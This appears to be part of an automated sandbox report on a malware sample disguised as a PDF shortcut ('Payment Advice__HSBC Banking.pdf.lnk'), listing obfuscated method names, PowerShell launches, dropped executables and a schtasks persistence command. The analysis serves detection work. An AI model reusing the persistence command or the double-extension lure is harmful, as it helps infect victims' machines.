Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, c2cMNMpYDGGCdGPNCV.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'fMnktTLXLy', 'f53kB1Hs3W', 'doAkzhdZEP', 'mUqQ75Unh6', 'tWcQ8Tq8ZZ', 'B3XQkgGALn', 'Sh9QQDBC6G', 'u1BxKpDoTTSW2HrvqNF'
Source: 3.2.PuttyTest777.pif.3acfb90.3.raw.unpack, BET2H7355jyJGS9kPV.cs	High entropy of concatenated method names: 'WQXVXXtMaL', 'uZxVId6NHp', 'DGlVrk8KL0', 'ToString', 'Wb9VMxA98E', 'y28VCOoJbB', 'BxaQYaYaJ5p7YgiDttw', 'hUXs4fY3fCmSojIpZeM', 'swZrCyY2AfjqaO2L7UG'
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, zLRx0Krvxpl94Gmelc.cs	High entropy of concatenated method names: 'EQB4L53l8P', 'gnK4ZijvRb', 'foC4gMcnln', 'URD4ilVIrQ', 'MHI4mNNXXH', 'RXg4w8t06r', 'Next', 'Next', 'Next', 'NextBytes'
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, JV8COMjuieAqErQMuGa.cs	High entropy of concatenated method names: 'jPpRUlBDat', 'RCjR0ikxwX', 'hV5RpFi5pq', 'uIPNh1ovZZDc03eJ9OK', 'McMdE6oHLhe1bMWnNWV', 'oSuCUIok5xYAhNTgSrd'
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, EtsJobhTeXI6X3UQ5n.cs	High entropy of concatenated method names: 'MZR5mbDnbO', 'sYs59UpbPG', 'ELE5Xl8Wmn', 'Gf25ISiCqV', 'kgg5rFZ9Zn', 'uXw5MmuTXG', 'ALS5C8Z78G', 'PeY5fAgDIq', 'sB25tZqQGv', 'yk55B2GSHp'
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, D9EudLlbHv2APZOL2i.cs	High entropy of concatenated method names: 'CNbQJAcVb5', 's7uQPiP1Cs', 'qCwQ5Sp0qi', 'BVUQHwjPCD', 'ekFQjGeXhY', 'v30QVXIgIu', 'ud1Q2dwpK7', 'wnqQhrb0hj', 'BxDQOIYIJh', 'VtdQEP7W9w'
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, j18cpQf7mkuHRbXFpl.cs	High entropy of concatenated method names: 'o272UcYVjI', 'IkQ20KqGI7', 'Bee2pXQMjH', 'eQj2DQTdAe', 'Vs82lUAkMh', 'eri2df75Ei', 'enW2xG6Nqv', 'S8j2NLVOuN', 'eTe2usWXRI', 'AN92Y3wW2o'
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, A70MiS059eBQ79exbu.cs	High entropy of concatenated method names: 'xiNqN60YdT', 'LsBqutc1Jf', 'ih3qLluX1e', 'wygqZDmxIU', 'DZoqiQTcjH', 'IlpqwxYBX6', 'vFfqcvBwNL', 'Fbsq6YhC0F', 'l2oqom147T', 'r0qqAKAP8x'
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, Fb16UU9rwEUap37uVW.cs	High entropy of concatenated method names: 'FO04PKlfRI', 'jtU45fpDLC', 'DBu4HERWIw', 'Ltb4jyWZr8', 'Bqo4VHukoc', 'KB942SWca1', 'X5n4hIjV45', 'SiG4OqU4E6', 'egg4E3Aepp', 'ScE4KkkTcJ'
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, dYK3NXtpx6kd8ZccpM.cs	High entropy of concatenated method names: 'AHX2PbPYFU', 'KeI2H6kBnq', 'sFL2VyVWur', 'SKfVBCmeuB', 'HVUVz1l4Mo', 'HLO27IrPX5', 'CW328M4t48', 'kww2kq2nm0', 'Uxm2Q4Jw3K', 'oxT2n6vIIk'
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, BoJSG7UDrVhUJiyNwB.cs	High entropy of concatenated method names: 'DpRTfK5287', 'y0XTB4lLio', 'jrN47Xag86', 'xqb48vHkqF', 'j1uTAE4QRk', 'kQDTaRHeAr', 'aECTF8Weda', 'TjKTmx7eui', 'qSuT9B5KRF', 'GFZTXiXn6X'
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, eghuitF4yljFm0lKkM.cs	High entropy of concatenated method names: 'zZh82TnHuT', 'b8e8hMmqKB', 'FUu8EXaogP', 'KLJ8KekqrH', 'aFL8W4Tdeg', 'jLO8y34GqS', 'jwPwoL7htqxuauRScp', 'zYAZtv4O4FkTpx5eq8', 'kog881ZcJ9', 'Va58QI35Ca'
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, RrYOk9jcPYBpJRwhDsY.cs	High entropy of concatenated method names: 'eAtSUwHgN2', 'LwrS0ieXrT', 'oZdSpgB5k3', 'pssSDPaBpW', 'VdMSlgpCkY', 'QoeSd330D1', 'tAgSxaElHl', 'CXiSNCPynd', 'omhSu8iVjP', 'qItSYsSmXe'
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, qIHWAkuExOeaUujlqY.cs	High entropy of concatenated method names: 'WSgpEZ4MG', 'X6UDM5hF3', 'BfEdO9uBN', 'LRqxPSlJ5', 'vsku4ysYV', 'ghdYeYsQy', 'yl6Xhbv0h2JfbU7SqD', 'mZx6j6HlhTU3SgfsrJ', 'v9L4nd4Dp', 'eVJRli8Gy'
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, JailI0yyD3oy9EWXGR.cs	High entropy of concatenated method names: 'nTaVJ9JO6e', 'SWjV5n3nAB', 'zXpVjSMBLu', 'RKbV2HJW6u', 'svEVhUYkvp', 'Yt8jr9vG3w', 'lwFjMpPhK0', 'qVQjCOCcbM', 'mMZjfc8u4e', 'Eehjtkoi7n'
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, RbFpxOjX2gByO9bfJbc.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't9DRmYdvGC', 'O0XR93NS9h', 'm6wRXmrjtq', 'I2pRIsfTlx', 'O9ORrH7n5H', 'tCjRM8qwpH', 'b9URC6kjV5'
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, mo2uG0YjKHD1aiAviU.cs	High entropy of concatenated method names: 'UvHTEHYYRJ', 'xR8TKpmMlK', 'ToString', 'A4ZTPOih7A', 'QkET5GVwmu', 'gu0THvvNke', 'YFXTjDiylY', 'gb4TVh1Q16', 'aFOT2UhtuD', 'vVmThxoyny'
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, j6B1wyQDUGbllhbbhO.cs	High entropy of concatenated method names: 'VALS8kp83n', 'hvISQYk9SH', 'FsXSnrS7WN', 'VS4SPoOcB5', 'iMXS5uwhRi', 'Nm3SjJEEYI', 'L3mSVG9KxB', 'qEE4CCL2ZQ', 'E2a4fOuEEW', 'qCP4tSb5AP'
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, CMxTafJa09SU85L67A.cs	High entropy of concatenated method names: 'esvjlLBaiq', 'jXGjx8b1RM', 'n7THglFIai', 'fgMHilYg5D', 'vOrHw7VjY1', 'qGvH1dRGHH', 'C2gHcxbfRd', 'lCTH6hxnQl', 'LouHbHacFB', 'H7jHoLOMJx'
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, fYR6BysfY0DiREaAo2.cs	High entropy of concatenated method names: 'bgdHDJcNPO', 'J9yHdcj4VN', 'TxZHN31kqQ', 'pSiHuGeLiT', 'juRHWDlrnJ', 'HKYHyXayuI', 'xryHT3oB1K', 'in0H4pscok', 'Pf4HSvybJh', 'h2xHROBbm0'
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, dMl8TwIyBpNEgmJauT.cs	High entropy of concatenated method names: 'MAjWoYxX44', 'JD4Wa9YnPK', 'paaWmQOT91', 'ecIW9tEfWO', 'DGjWZHl3We', 'fGmWgna66x', 'mx4WiedG3y', 'dfPWwhj2mN', 'U3KW1AwCCZ', 'QdFWcLbt4N'
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, rOQN4VeudJysxd8645.cs	High entropy of concatenated method names: 'Dispose', 'n7n8tvTYUg', 'tEQkZNpeyR', 'FlJGGYUBaQ', 'xqv8BeqsIM', 'Xrd8zIRogm', 'ProcessDialogKey', 'wmOk7vSu2J', 'K0rk85TTNo', 'Rflkk4Vh95'
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, c2cMNMpYDGGCdGPNCV.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'fMnktTLXLy', 'f53kB1Hs3W', 'doAkzhdZEP', 'mUqQ75Unh6', 'tWcQ8Tq8ZZ', 'B3XQkgGALn', 'Sh9QQDBC6G', 'u1BxKpDoTTSW2HrvqNF'
Source: 3.2.PuttyTest777.pif.6e40000.8.raw.unpack, BET2H7355jyJGS9kPV.cs	High entropy of concatenated method names: 'WQXVXXtMaL', 'uZxVId6NHp', 'DGlVrk8KL0', 'ToString', 'Wb9VMxA98E', 'y28VCOoJbB', 'BxaQYaYaJ5p7YgiDttw', 'hUXs4fY3fCmSojIpZeM', 'swZrCyY2AfjqaO2L7UG'

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\PuttyTest777.pif

Jump to dropped file

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_004063C6 ShellExecuteW,URLDownloadToFileW,

17_2_004063C6

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\PuttyTest777.pif			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	File created: C:\Users\user\AppData\Roaming\HODoCxSdp.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HODoCxSdp" /XML "C:\Users\user\AppData\Local\Temp\tmpE952.tmp"

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

Code function: 17_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

17_2_00418A00

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: pdf.lnk

Static PE information: Payment Advice__HSBC Banking.pdf.lnk

Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe

17_2_0041A8DA

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
